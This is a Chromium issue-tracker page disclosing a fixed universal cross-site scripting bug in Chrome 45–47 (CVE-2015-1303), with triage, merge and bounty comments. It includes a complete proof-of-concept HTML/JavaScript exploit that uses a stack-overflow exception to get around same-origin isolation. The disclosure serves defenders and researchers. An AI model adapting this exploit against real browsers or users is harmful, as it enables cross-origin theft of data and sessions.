New issue
Advanced search Search tips

Issue 530301 link

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Sep 2015
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: Universal XSS using stack overflow exceptions

Reported by marius.mlynski@gmail.com, Sep 10 2015

Issue description

VULNERABILITY DETAILS
When the maximum call stack size is exceeded, a RangeError object is created using isolate's current context. Thus, if a cross-origin context had been entered (through the V8WrapperInstantiationScope constructor, for example), a cross-origin exception will be propagated to the catch handler.

VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2507.0 (Release build compiled today)

REPRODUCTION CASE
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() {
  var w = frames[0];
  function f() {
    try { f(); } catch(e) {}
    try { w.location; } catch(e) { o = e; }
  }
  f();
  o.constructor.constructor('alert(location)')();
}

function c() {
  try { frames[0].a; } catch(e) {
    clearInterval(s);
    g();
  }
}

var s = setInterval(c, 1);
i.src = 'https://abc.xyz';
</script>
 
exploit.html
452 bytes View Download

Comment 1 by rickyz@chromium.org, Sep 10 2015

Labels: Security_Severity-High Security_Impact-Stable Pri-1 OS-All Cr-Blink-Bindings
Owner: jochen@chromium.org
Nice find!
Project Member

Comment 2 by ClusterFuzz, Sep 11 2015

Labels: M-45

Comment 4 by jochen@chromium.org, Sep 14 2015

Status: Fixed
Project Member

Comment 5 by ClusterFuzz, Sep 14 2015

Labels: -Restrict-View-SecurityTeam Merge-Triage M-46 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 6 by jochen@chromium.org, Sep 15 2015

Labels: Merge-Request-46
Labels: Merge-Request-45
I would propose merging this to 45 too.

Comment 8 by amin...@google.com, Sep 15 2015

Labels: -Merge-Request-46 -Merge-Request-45 Merge-Approved-46 Merge-Approved-45
Merge approved for M45 branch 2454 and M46 branch 2490.

Comment 9 by jww@chromium.org, Sep 15 2015

Cc: adamk@chromium.org
Labels: -Merge-Triage
Labels: reward-topanel
Labels: CVE-2015-1303 Release-2-M45
Project Member

Comment 17 by ClusterFuzz, Dec 21 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-topanel -merge-merged-2454 reward-7500 Merge-Merged-2454 reward-unpaid
Maruisz - $7,500 for this report. We'll add it to your tab.
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 20 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment